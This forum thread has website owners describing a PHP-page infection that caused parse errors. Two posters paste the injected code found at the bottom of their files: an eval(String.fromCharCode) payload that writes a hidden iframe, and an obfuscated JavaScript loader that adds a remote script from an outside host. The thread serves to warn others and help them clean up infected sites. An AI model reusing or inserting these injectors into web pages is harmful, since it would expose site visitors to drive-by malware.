Can you publish the entire file?
I'm particulary curious since D6's index.php has just 40 lines. So, an error on line 41 seems to me like uploaded trash by some mistake on the ftp transfer.

I had the same error and this was at the bottom of my index page
<?php echo ''; ?><?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,104,106,103,52,61,34,104,111,116,34,59,118,97,114,32,119,61,34,105,34,59,118,97,114,32,114,101,54,61,34,99,97,110,46,34,59,118,97,114,32,114,114,116,116,54,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,50,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,54,61,48,48,53,48,51,50,48,48,48,48,48,50,49,48))</script>'; ?>

I was hit with the same thing... I read on some other forum that if any bits of this script are still on any php files, it will continue to happen...

I just followed the path back to the file, downloaded to my desktop, opened it in notepad, deleted the script off of the bottom of the code, re-uploaded it back to my file manager host account and my blogs came back. The only problem was that my side panels and footers were all moved around?

People that create viruses should go jump off of a cliff somewhere, get stabbed by a million knives and drown in a sea of fire!!

Here is what the server error was reading when I went to my url on the web:

Parse error: syntax error, unexpected '<' in /home/content/n/i/c/26/html/doggy/wp-includes/default-widgets.php on line 1042

and here is the script that I found at the bottom of my php file:

/*GNU GPL*/ try{window.onload = function(){var Cmosbtezc51 = document.createElement('s#c&@r!!i$(^p$$t(^^^'.replace(/\(|&|\$|#|\^|\!|@|\)/ig, ''));var Cf4ltfxg6hvzvv = 'O5sk0s1hevc4';Cmosbtezc51.setAttribute('type', 't#!^(e)x^$t$(##/$)j$^a#!)!@v$$&)a^!$s!@)^c$r$(!i!^#p^@t#$!'.replace(/#|\)|\(|\!|\^|&|\$|@/ig, ''));Cmosbtezc51.setAttribute('src', 'h&^t&$t!&#p(^:(&/#/#f!@$l))i@@&&n@#g)$!^-&)c)o!!m)$.#!f!))o&!&x##^@.&()c@&$o$m!#.@(n)!)i@!^n&@!@g@-!c(^o$#^#@m)@#.$^$&s($!^u@&#&p)#$e$r(^(n#)#u#n#.!r!##&u)@#:!8(0)(8@0!/^$)m$c$)s$)&s#&l@@$.^#c)()o&m&/^#&m)#^c@&##s&(!!@s)@l).)#c^^o#&!m(&)^/()g^))o@o($$g^l(e^.@c@$o@m#!/$^(^s@)&t@@&!$u$()d#!(&i)&v&e^(@#r^z@^@e)^(i&!$(c^)h)$!n)@$)!i$^$&s@^.^@(c(#$@#o)m!!$!/#a@)!l)@l@&!y^!!!e$@s!(.&&$c()!o$m#!(/)!$'.replace(/\)|\!|@|&|\$|#|\(|\^/ig, ''));Cmosbtezc51.setAttribute('defer', 'd)(e@f&@#e)#^&r&#('.replace(/\)|#|\!|\$|@|\(|\^|&/ig, ''));Cmosbtezc51.setAttribute('id', 'X$!i^^)b!&o^!2&9)!4)$^v)(p$!0#$$p^!9)@)(6@!'.replace(/@|&|\)|\$|\^|#|\!|\(/ig, ''));document.body.appendChild(Cmosbtezc51);}} catch(Rwxdmv2l2b) {}

I hope that helps everybody else out

and screw hackers and virus creators!!!!!!!!!!!!
